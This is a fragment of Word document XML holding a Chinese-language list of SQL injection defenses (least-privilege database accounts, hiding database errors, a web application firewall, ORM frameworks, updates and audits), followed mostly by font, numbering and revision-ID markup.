          <w:p w14:paraId="274F3DEA">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:leftChars="0" w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>数据库连接应分配最小必要权限。例如，只读操作的应用程序不应被授予插入、修改或删除数据的权限，从而限制潜在攻击的破坏范围。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="340AD9B0">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="782C61DE">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>避免暴露数据库错误信息：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E6BCF4F">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:leftChars="0" w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>应用程序在处理异常时不应直接将数据库错误信息返回给用户，以防泄露数据库结构或版本等敏感信息。应使用通用的用户提示信息，并将详细错误记录写入日志供后台管理员排查。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="17C8F5A4">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="150B92F3">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>部署 Web 应用防火墙（WAF）：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25872572">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:leftChars="0" w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>WAF 可实时监控和分析应用层流量，识别并拦截 SQL 注入等常见攻击，有效提升应用系统的整体安全性。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48483434">
            <w:pPr>
              <w:bidi w:val="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1E1AC047">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>使用 ORM 框架降低注入风险：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2DEB00DF">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:leftChars="0" w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>采用如 Hibernate、Entity Framework 等对象关系映射（ORM）框架开发系统，可减少直接操作 SQL 的频率。ORM 通常内置参数绑定和数据验证机制，天然具备防注入能力。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10354D97">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2069908B">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>保持系统更新并进行安全审计：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4C0B9A87">
            <w:pPr>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="0"/>
              </w:numPr>
              <w:bidi w:val="0"/>
              <w:ind w:leftChars="0" w:firstLine="440" w:firstLineChars="200"/>
            </w:pPr>
            <w:r>
              <w:t>应及时更新数据库管理系统（DBMS）与 Web 应用程序，修补已知漏洞。同时，建议使用日志和监控工具跟踪系统运行状态，定期进行安全审计，及时发现并处理潜在安全隐患。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4F0263A0">
            <w:pPr>
              <w:bidi w:val="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="6B489063">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default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:kern w:val="2"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="20"/>
                <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6F2BA577">
      <w:pPr>
        <w:bidi w:val="0"/>
      </w:pP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宋体">
    <w:panose1 w:val="02010600040101010101"/>
    <w:charset w:val="86"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000287" w:usb1="080F0000" w:usb2="00000000" w:usb3="00000000" w:csb0="0004009F" w:csb1="DFD70000"/>
  </w:font>
  <w:font w:name="Tahoma">
    <w:panose1 w:val="020B0604030504040204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="E1002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="200101FF" w:csb1="2028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Times New Roman Bold">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="02020503050405090304"/>
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000001" w:usb3="00000000" w:csb0="400001BF" w:csb1="DFF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6C1542"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8E6C15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98E46153"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="98E46153"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2">
    <w:nsid w:val="9DEB2155"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="9DEB2155"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="3">
    <w:nsid w:val="B308D191"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B308D1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318DE84"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="B318DE84"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="4"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:nsid w:val="B875BEAB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B875BE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E41ABAA0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E41ABA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F49864A1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F49864A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FFEE32A6"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="FFEE32A6"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="chineseCounting"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:rPr>
        <w:rFonts w:hint="eastAsia"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="9">
    <w:nsid w:val="2B7BDE51"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2B7BDE5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301B64B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="301B64B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4187AD23"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="4187AD23"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="283" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b/>
        <w:bCs w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="12">
    <w:nsid w:val="5C2A5603"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="5C2A5603"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="723" w:hanging="283"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        <w:b w:val="0"/>
        <w:bCs w:val="0"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="13">
    <w:nsid w:val="7172F9DD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7172F9DD"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="420"/>
        </w:tabs>
        <w:ind w:left="283" w:hanging="283"/>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4">
    <w:nsid w:val="7FF31E08"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="7FF31E08"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="3"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="312"/>
        </w:tabs>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:num w:numId="1">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="2">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="3">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="11"/>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OGY5ODQ2YzNlM2UzNTZkNWRhNWRlYmY3MTJiYzM0OTgifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00D31D50"/>
    <w:rsid w:val="000464C0"/>
    <w:rsid w:val="00125B21"/>
    <w:rsid w:val="00176A93"/>
    <w:rsid w:val="001B0DA1"/>
    <w:rsid w:val="001D5FB4"/>
    <w:rsid w:val="001F3ADA"/>
    <w:rsid w:val="001F5C55"/>
    <w:rsid w:val="00227DCD"/>
    <w:rsid w:val="0028261B"/>
    <w:rsid w:val="0029005F"/>
    <w:rsid w:val="002D37B1"/>
    <w:rsid w:val="00323B43"/>
    <w:rsid w:val="003752C8"/>
    <w:rsid w:val="003D1456"/>
    <w:rsid w:val="003D37D8"/>
    <w:rsid w:val="003F4DEC"/>
    <w:rsid w:val="003F5324"/>
    <w:rsid w:val="00426133"/>
    <w:rsid w:val="00427A62"/>
    <w:rsid w:val="00427AC4"/>
    <w:rsid w:val="004358AB"/>
    <w:rsid w:val="00443E3E"/>
    <w:rsid w:val="00455D87"/>
    <w:rsid w:val="004942C0"/>
    <w:rsid w:val="004D482E"/>
    <w:rsid w:val="004D4C10"/>
    <w:rsid w:val="00541E85"/>
    <w:rsid w:val="00564F3D"/>
    <w:rsid w:val="0057041B"/>
    <w:rsid w:val="005E5EB3"/>
    <w:rsid w:val="00601178"/>
    <w:rsid w:val="00654CE7"/>
    <w:rsid w:val="006D0CE9"/>
    <w:rsid w:val="007A6F63"/>
    <w:rsid w:val="007F0509"/>
    <w:rsid w:val="00807833"/>
    <w:rsid w:val="008B0727"/>
    <w:rsid w:val="008B7726"/>
    <w:rsid w:val="00960C5D"/>
    <w:rsid w:val="00973DC7"/>
    <w:rsid w:val="00A2325E"/>
    <w:rsid w:val="00A37B76"/>
    <w:rsid w:val="00A44835"/>
    <w:rsid w:val="00AB0961"/>
    <w:rsid w:val="00B124AB"/>
    <w:rsid w:val="00B126A2"/>
    <w:rsid w:val="00BC4791"/>
    <w:rsid w:val="00C47A2E"/>
    <w:rsid w:val="00C721B7"/>
    <w:rsid w:val="00D0426E"/>
    <w:rsid w:val="00D31D50"/>
    <w:rsid w:val="00D61110"/>
    <w:rsid w:val="00DE6963"/>
    <w:rsid w:val="00DF2E70"/>
    <w:rsid w:val="00E54AEE"/>
    <w:rsid w:val="00E66E21"/>
    <w:rsid w:val="00E70AF7"/>
    <w:rsid w:val="00E73574"/>
    <w:rsid w:val="00EC3668"/>
    <w:rsid w:val="00F17314"/>
    <w:rsid w:val="00F50891"/>
    <w:rsid w:val="00F6708E"/>
    <w:rsid w:val="00F67960"/>
    <w:rsid w:val="00FC46D1"/>
    <w:rsid w:val="0121318E"/>
    <w:rsid w:val="012E27C8"/>
    <w:rsid w:val="01620FE6"/>
    <w:rsid w:val="016E2F6B"/>
    <w:rsid w:val="018151B6"/>
    <w:rsid w:val="01BD35AB"/>
    <w:rsid w:val="01D3326A"/>
    <w:rsid w:val="024840D7"/>
    <w:rsid w:val="02867E41"/>
    <w:rsid w:val="02A23A3C"/>
    <w:rsid w:val="02C91717"/>
    <w:rsid w:val="02E80AFB"/>
    <w:rsid w:val="03647601"/>
    <w:rsid w:val="03683E64"/>
    <w:rsid w:val="03881107"/>
    <w:rsid w:val="03A87905"/>
    <w:rsid w:val="03B46C2F"/>
    <w:rsid w:val="03E2722B"/>
    <w:rsid w:val="04126045"/>
    <w:rsid w:val="042E590E"/>
    <w:rsid w:val="043C6087"/>
    <w:rsid w:val="0473605D"/>
    <w:rsid w:val="04C55066"/>
    <w:rsid w:val="04CB2483"/>
    <w:rsid w:val="04D15652"/>
    <w:rsid w:val="04EA4C99"/>
    <w:rsid w:val="04F15AD1"/>
    <w:rsid w:val="05072F69"/>
    <w:rsid w:val="050E411D"/>
    <w:rsid w:val="05115D6D"/>
    <w:rsid w:val="05363B56"/>
    <w:rsid w:val="05551D4C"/>
    <w:rsid w:val="05597A8E"/>
    <w:rsid w:val="056267F6"/>
    <w:rsid w:val="05724CA0"/>
    <w:rsid w:val="05964489"/>
    <w:rsid w:val="05C375FE"/>
    <w:rsid w:val="05EE492D"/>
    <w:rsid w:val="06007F0A"/>
    <w:rsid w:val="060379FA"/>
    <w:rsid w:val="060C53A2"/>
    <w:rsid w:val="0635559F"/>
    <w:rsid w:val="065F10D4"/>
    <w:rsid w:val="065F7E60"/>
    <w:rsid w:val="06775734"/>
    <w:rsid w:val="068154EF"/>
    <w:rsid w:val="06B70F10"/>
    <w:rsid w:val="06B754DD"/>
    <w:rsid w:val="0717797F"/>
    <w:rsid w:val="07231555"/>
    <w:rsid w:val="07605B88"/>
    <w:rsid w:val="076104C8"/>
    <w:rsid w:val="07863B16"/>
    <w:rsid w:val="07945B32"/>
    <w:rsid w:val="07AA45D1"/>
    <w:rsid w:val="07B70B3C"/>
    <w:rsid w:val="07F71602"/>
    <w:rsid w:val="080A06FB"/>
    <w:rsid w:val="081B6D81"/>
    <w:rsid w:val="08242C5A"/>
    <w:rsid w:val="08335C50"/>
    <w:rsid w:val="08410120"/>
    <w:rsid w:val="08412CE0"/>
    <w:rsid w:val="084560A8"/>
    <w:rsid w:val="08751A8F"/>
    <w:rsid w:val="08D13DE0"/>
    <w:rsid w:val="08DD7A6D"/>
    <w:rsid w:val="08FC322B"/>
    <w:rsid w:val="08FD2E27"/>
    <w:rsid w:val="09124AC5"/>
    <w:rsid w:val="09175C96"/>
    <w:rsid w:val="091F0FEF"/>
    <w:rsid w:val="094D5F72"/>
    <w:rsid w:val="09526CCE"/>
    <w:rsid w:val="096D2029"/>
    <w:rsid w:val="099B67B3"/>
    <w:rsid w:val="0A0B23D2"/>
    <w:rsid w:val="0A0F4281"/>
    <w:rsid w:val="0A195873"/>
    <w:rsid w:val="0A2624D0"/>
    <w:rsid w:val="0A5E5C25"/>
    <w:rsid w:val="0A880DA1"/>
    <w:rsid w:val="0AB063A2"/>
    <w:rsid w:val="0B6E7AA2"/>
    <w:rsid w:val="0B9D4CB5"/>
    <w:rsid w:val="0BAB4DBC"/>
    <w:rsid w:val="0BC35C62"/>
    <w:rsid w:val="0BCE57F8"/>
    <w:rsid w:val="0BE37CA1"/>
    <w:rsid w:val="0BE93A90"/>
    <w:rsid w:val="0C2653A0"/>
    <w:rsid w:val="0C4826BA"/>
    <w:rsid w:val="0CA3325A"/>
    <w:rsid w:val="0CBA3DB4"/>
    <w:rsid w:val="0CD51E96"/>
    <w:rsid w:val="0CDD473D"/>
    <w:rsid w:val="0CF57932"/>
    <w:rsid w:val="0CFF7B5C"/>
    <w:rsid w:val="0D3844B6"/>
    <w:rsid w:val="0D70006B"/>
    <w:rsid w:val="0D757501"/>
    <w:rsid w:val="0D7C256C"/>
    <w:rsid w:val="0D865199"/>
    <w:rsid w:val="0D9F5204"/>
    <w:rsid w:val="0DC43625"/>
    <w:rsid w:val="0E2850BF"/>
    <w:rsid w:val="0E4137B5"/>
    <w:rsid w:val="0EA753E8"/>
    <w:rsid w:val="0EE800BC"/>
    <w:rsid w:val="0EF44384"/>
    <w:rsid w:val="0FB00B75"/>
    <w:rsid w:val="0FCE7E93"/>
    <w:rsid w:val="0FD17E1B"/>
    <w:rsid w:val="0FD961A1"/>
    <w:rsid w:val="10090F42"/>
    <w:rsid w:val="101925CA"/>
    <w:rsid w:val="10340294"/>
    <w:rsid w:val="10482BD9"/>
    <w:rsid w:val="10495D89"/>
    <w:rsid w:val="105907FD"/>
    <w:rsid w:val="106A3299"/>
    <w:rsid w:val="10954003"/>
    <w:rsid w:val="10A84A5E"/>
    <w:rsid w:val="10E70644"/>
    <w:rsid w:val="10EE19D3"/>
    <w:rsid w:val="10F22B45"/>
    <w:rsid w:val="11000BEA"/>
    <w:rsid w:val="113849FC"/>
    <w:rsid w:val="115D57ED"/>
    <w:rsid w:val="11687668"/>
    <w:rsid w:val="11B429A9"/>
    <w:rsid w:val="11FC011F"/>
    <w:rsid w:val="12484BE2"/>
    <w:rsid w:val="125C0BBE"/>
    <w:rsid w:val="129B7938"/>
    <w:rsid w:val="12A10762"/>
    <w:rsid w:val="12A5513E"/>
    <w:rsid w:val="12B225D0"/>
    <w:rsid w:val="12C53009"/>
    <w:rsid w:val="130312F4"/>
    <w:rsid w:val="13441D7E"/>
    <w:rsid w:val="13550837"/>
    <w:rsid w:val="13663891"/>
    <w:rsid w:val="137C095E"/>
    <w:rsid w:val="139A7BF0"/>
    <w:rsid w:val="13A201F7"/>
    <w:rsid w:val="13A34576"/>
    <w:rsid w:val="142119AF"/>
    <w:rsid w:val="143A0E25"/>
    <w:rsid w:val="14740960"/>
    <w:rsid w:val="149D4D5A"/>
    <w:rsid w:val="149F2000"/>
    <w:rsid w:val="14A405FA"/>
    <w:rsid w:val="14AC0EF9"/>
    <w:rsid w:val="14BF2D1A"/>
    <w:rsid w:val="14F15C58"/>
    <w:rsid w:val="15155054"/>
    <w:rsid w:val="15484F82"/>
    <w:rsid w:val="155838BF"/>
    <w:rsid w:val="157C1645"/>
    <w:rsid w:val="158F624B"/>
    <w:rsid w:val="15984BA7"/>
    <w:rsid w:val="15995C85"/>
    <w:rsid w:val="15B36D47"/>
    <w:rsid w:val="15CA22E2"/>
    <w:rsid w:val="15EF1687"/>
    <w:rsid w:val="16004A0E"/>
    <w:rsid w:val="162B0FD3"/>
    <w:rsid w:val="163065E9"/>
    <w:rsid w:val="164756E1"/>
    <w:rsid w:val="1659352F"/>
    <w:rsid w:val="165D6452"/>
    <w:rsid w:val="168006B6"/>
    <w:rsid w:val="16810BF3"/>
    <w:rsid w:val="16847A90"/>
    <w:rsid w:val="16AF095C"/>
    <w:rsid w:val="16E557E9"/>
    <w:rsid w:val="16F70EB5"/>
    <w:rsid w:val="170671B4"/>
    <w:rsid w:val="17435EA8"/>
    <w:rsid w:val="174D31CB"/>
    <w:rsid w:val="17521A59"/>
    <w:rsid w:val="17766986"/>
    <w:rsid w:val="177822EF"/>
    <w:rsid w:val="17991F6C"/>
    <w:rsid w:val="17A97951"/>
    <w:rsid w:val="17C23271"/>
    <w:rsid w:val="17C831D0"/>
    <w:rsid w:val="17D363F7"/>
    <w:rsid w:val="17DD4AA9"/>
    <w:rsid w:val="180C394D"/>
    <w:rsid w:val="1831400C"/>
    <w:rsid w:val="1840349F"/>
    <w:rsid w:val="18477A39"/>
    <w:rsid w:val="18704C0C"/>
    <w:rsid w:val="18B10430"/>
    <w:rsid w:val="18BD1C8B"/>
    <w:rsid w:val="18DD4ADF"/>
    <w:rsid w:val="19140DAC"/>
    <w:rsid w:val="1920293C"/>
    <w:rsid w:val="19473DF2"/>
    <w:rsid w:val="19497C1E"/>
    <w:rsid w:val="195066E0"/>
    <w:rsid w:val="19743E51"/>
    <w:rsid w:val="19744A3F"/>
    <w:rsid w:val="197E0271"/>
    <w:rsid w:val="198D3D53"/>
    <w:rsid w:val="1995519E"/>
    <w:rsid w:val="19A74E14"/>
    <w:rsid w:val="19C84D8B"/>
    <w:rsid w:val="19FA6E77"/>
    <w:rsid w:val="1A126F7E"/>
    <w:rsid w:val="1A1B310D"/>
    <w:rsid w:val="1A247F34"/>
    <w:rsid w:val="1A253F8B"/>
    <w:rsid w:val="1A314E94"/>
    <w:rsid w:val="1A4A1BD2"/>
    <w:rsid w:val="1A9534C5"/>
    <w:rsid w:val="1AAC2302"/>
    <w:rsid w:val="1AAE5081"/>
    <w:rsid w:val="1AC81D20"/>
    <w:rsid w:val="1ADF72F8"/>
    <w:rsid w:val="1AFD60C2"/>
    <w:rsid w:val="1B0700AB"/>
    <w:rsid w:val="1B944F25"/>
    <w:rsid w:val="1BAE5659"/>
    <w:rsid w:val="1BBD0220"/>
    <w:rsid w:val="1BD83FB4"/>
    <w:rsid w:val="1BF63E31"/>
    <w:rsid w:val="1C316C17"/>
    <w:rsid w:val="1C7D1864"/>
    <w:rsid w:val="1C880DC7"/>
    <w:rsid w:val="1CAC2F31"/>
    <w:rsid w:val="1CB56D70"/>
    <w:rsid w:val="1CE1575A"/>
    <w:rsid w:val="1CE7377A"/>
    <w:rsid w:val="1CE819CC"/>
    <w:rsid w:val="1CFA16FF"/>
    <w:rsid w:val="1CFD4D4B"/>
    <w:rsid w:val="1D5030CD"/>
    <w:rsid w:val="1D812571"/>
    <w:rsid w:val="1DB722E0"/>
    <w:rsid w:val="1DCC103B"/>
    <w:rsid w:val="1DD83FF8"/>
    <w:rsid w:val="1DFB74DD"/>
    <w:rsid w:val="1E33469D"/>
    <w:rsid w:val="1E5348E9"/>
    <w:rsid w:val="1E996A3D"/>
    <w:rsid w:val="1ED75A22"/>
    <w:rsid w:val="1EEF1F39"/>
    <w:rsid w:val="1EFB00AF"/>
    <w:rsid w:val="1F152820"/>
    <w:rsid w:val="1F5B35E5"/>
    <w:rsid w:val="1F647304"/>
    <w:rsid w:val="1F7D1081"/>
    <w:rsid w:val="1F890386"/>
    <w:rsid w:val="1F91700A"/>
    <w:rsid w:val="1FD224BF"/>
    <w:rsid w:val="1FDF2EF9"/>
    <w:rsid w:val="200B3E35"/>
    <w:rsid w:val="201402A2"/>
    <w:rsid w:val="205975FC"/>
    <w:rsid w:val="20607C5E"/>
    <w:rsid w:val="20631D11"/>
    <w:rsid w:val="20684BD2"/>
    <w:rsid w:val="206A7390"/>
    <w:rsid w:val="207D68CF"/>
    <w:rsid w:val="2080016D"/>
    <w:rsid w:val="20806BB5"/>
    <w:rsid w:val="20CD4C3D"/>
    <w:rsid w:val="20DC2DB7"/>
    <w:rsid w:val="20E97AC1"/>
    <w:rsid w:val="20F8421E"/>
    <w:rsid w:val="21007728"/>
    <w:rsid w:val="21343066"/>
    <w:rsid w:val="213468EC"/>
    <w:rsid w:val="216851C5"/>
    <w:rsid w:val="216B5E83"/>
    <w:rsid w:val="21935C7E"/>
    <w:rsid w:val="2204454B"/>
    <w:rsid w:val="220C5B3E"/>
    <w:rsid w:val="2214723A"/>
    <w:rsid w:val="22196184"/>
    <w:rsid w:val="225D0766"/>
    <w:rsid w:val="227C6712"/>
    <w:rsid w:val="22972131"/>
    <w:rsid w:val="22C1090A"/>
    <w:rsid w:val="22C82D29"/>
    <w:rsid w:val="22D10D3B"/>
    <w:rsid w:val="22E7748A"/>
    <w:rsid w:val="22F05814"/>
    <w:rsid w:val="22F80DAF"/>
    <w:rsid w:val="230534E1"/>
    <w:rsid w:val="231B5F2B"/>
    <w:rsid w:val="233B1B71"/>
    <w:rsid w:val="233E3859"/>
    <w:rsid w:val="233F2E5B"/>
    <w:rsid w:val="2340480E"/>
    <w:rsid w:val="2347257A"/>
    <w:rsid w:val="234C4E06"/>
    <w:rsid w:val="2375497A"/>
    <w:rsid w:val="237F6ED9"/>
    <w:rsid w:val="2398713A"/>
    <w:rsid w:val="23D74860"/>
    <w:rsid w:val="23EE50C5"/>
    <w:rsid w:val="23EF1892"/>
    <w:rsid w:val="23FE41D2"/>
    <w:rsid w:val="240179A7"/>
    <w:rsid w:val="240226DE"/>
    <w:rsid w:val="2406231C"/>
    <w:rsid w:val="24114748"/>
    <w:rsid w:val="24277805"/>
    <w:rsid w:val="24307FC1"/>
    <w:rsid w:val="243403E4"/>
    <w:rsid w:val="243C3420"/>
    <w:rsid w:val="24404245"/>
    <w:rsid w:val="2443573A"/>
    <w:rsid w:val="24617230"/>
    <w:rsid w:val="24843ABD"/>
    <w:rsid w:val="249F043C"/>
    <w:rsid w:val="24B06D66"/>
    <w:rsid w:val="24B77ED6"/>
    <w:rsid w:val="24BF6C72"/>
    <w:rsid w:val="24C8178C"/>
    <w:rsid w:val="24CD76F9"/>
    <w:rsid w:val="24E62827"/>
    <w:rsid w:val="24F37160"/>
    <w:rsid w:val="24F95EF4"/>
    <w:rsid w:val="25021151"/>
    <w:rsid w:val="250741E9"/>
    <w:rsid w:val="251175E6"/>
    <w:rsid w:val="251C461B"/>
    <w:rsid w:val="252902FC"/>
    <w:rsid w:val="253F3954"/>
    <w:rsid w:val="258B5516"/>
    <w:rsid w:val="25C40EE0"/>
    <w:rsid w:val="25F5515A"/>
    <w:rsid w:val="262C1F83"/>
    <w:rsid w:val="264C1537"/>
    <w:rsid w:val="2650632F"/>
    <w:rsid w:val="265E0B0C"/>
    <w:rsid w:val="268442D5"/>
    <w:rsid w:val="26855C1A"/>
    <w:rsid w:val="26940F9E"/>
    <w:rsid w:val="26B8127A"/>
    <w:rsid w:val="26CF59AB"/>
    <w:rsid w:val="26D134D1"/>
    <w:rsid w:val="271B474C"/>
    <w:rsid w:val="27363334"/>
    <w:rsid w:val="273E55C5"/>
    <w:rsid w:val="278B74E5"/>
    <w:rsid w:val="279135A5"/>
    <w:rsid w:val="27E54E49"/>
    <w:rsid w:val="28041684"/>
    <w:rsid w:val="282018BC"/>
    <w:rsid w:val="286E3BC6"/>
